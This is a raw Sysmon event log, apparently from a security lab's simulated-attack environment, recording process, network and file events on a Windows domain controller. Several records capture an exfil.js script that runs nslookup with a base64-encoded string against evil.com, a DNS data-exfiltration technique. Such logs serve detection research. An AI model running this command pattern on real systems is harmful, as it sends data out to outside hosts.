process>-udpfalsefalse127.0.0.1-53119-false127.0.0.1-53domain 354300x8000000000000000204886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.118{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53119- 354300x8000000000000000204885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53119- 354300x8000000000000000204884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{00000000-0000-0000-0000-000000000000}5332<unknown process>-udptruefalse127.0.0.1-53119-false127.0.0.1-53domain 354300x8000000000000000204883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{00000000-0000-0000-0000-000000000000}5332<unknown process>-udpfalsefalse127.0.0.1-53118-false127.0.0.1-53domain 354300x8000000000000000204882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53118- 354300x8000000000000000204881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53118- 354300x8000000000000000204880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{00000000-0000-0000-0000-000000000000}5332<unknown process>-udptruefalse127.0.0.1-53118-false127.0.0.1-53domain 354300x8000000000000000204879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{00000000-0000-0000-0000-000000000000}5332<unknown process>-udpfalsefalse127.0.0.1-53117-false127.0.0.1-53domain 354300x8000000000000000204878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53117- 354300x8000000000000000204877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53117- 354300x8000000000000000204876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{00000000-0000-0000-0000-000000000000}5332<unknown process>-udptruefalse127.0.0.1-53117-false127.0.0.1-53domain 354300x8000000000000000204875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.980{00000000-0000-0000-0000-000000000000}3848<unknown process>-udpfalsefalse127.0.0.1-53116-false127.0.0.1-53domain 354300x8000000000000000204874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.980{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53116- 23542300x8000000000000000204873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.579{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlomkll.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.542{2E1864BB-17CF-629A-4342-000000005F02}21082336C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-4442-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.542{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.542{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.542{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.542{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.542{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-4442-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.542{2E1864BB-17CF-629A-4242-000000005F02}55887308C:\Windows\system32\cmd.exe{2E1864BB-17CF-629A-4442-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.546{2E1864BB-17CF-629A-4442-000000005F02}5912C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CF-629A-4242-000000005F02}5588C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomkll.tmp 2>&1 10341000x8000000000000000204864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.526{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-4342-000000005F02}2108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.526{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-4342-000000005F02}2108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.526{2E1864BB-17CF-629A-4342-000000005F02}21082336C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-4242-000000005F02}5588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.510{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-4342-000000005F02}2108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.510{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-4242-000000005F02}5588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.510{2E1864BB-17A1-629A-783D-000000005F02}55527384C:\Windows\System32\WScript.exe{2E1864BB-17CF-629A-4242-000000005F02}5588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.511{2E1864BB-17CF-629A-4242-000000005F02}5588C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomkll.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.495{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlldmf.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.463{2E1864BB-17CF-629A-4042-000000005F02}8961772C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-4142-000000005F02}7580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.463{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.463{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.463{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.463{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.463{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-4142-000000005F02}7580C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 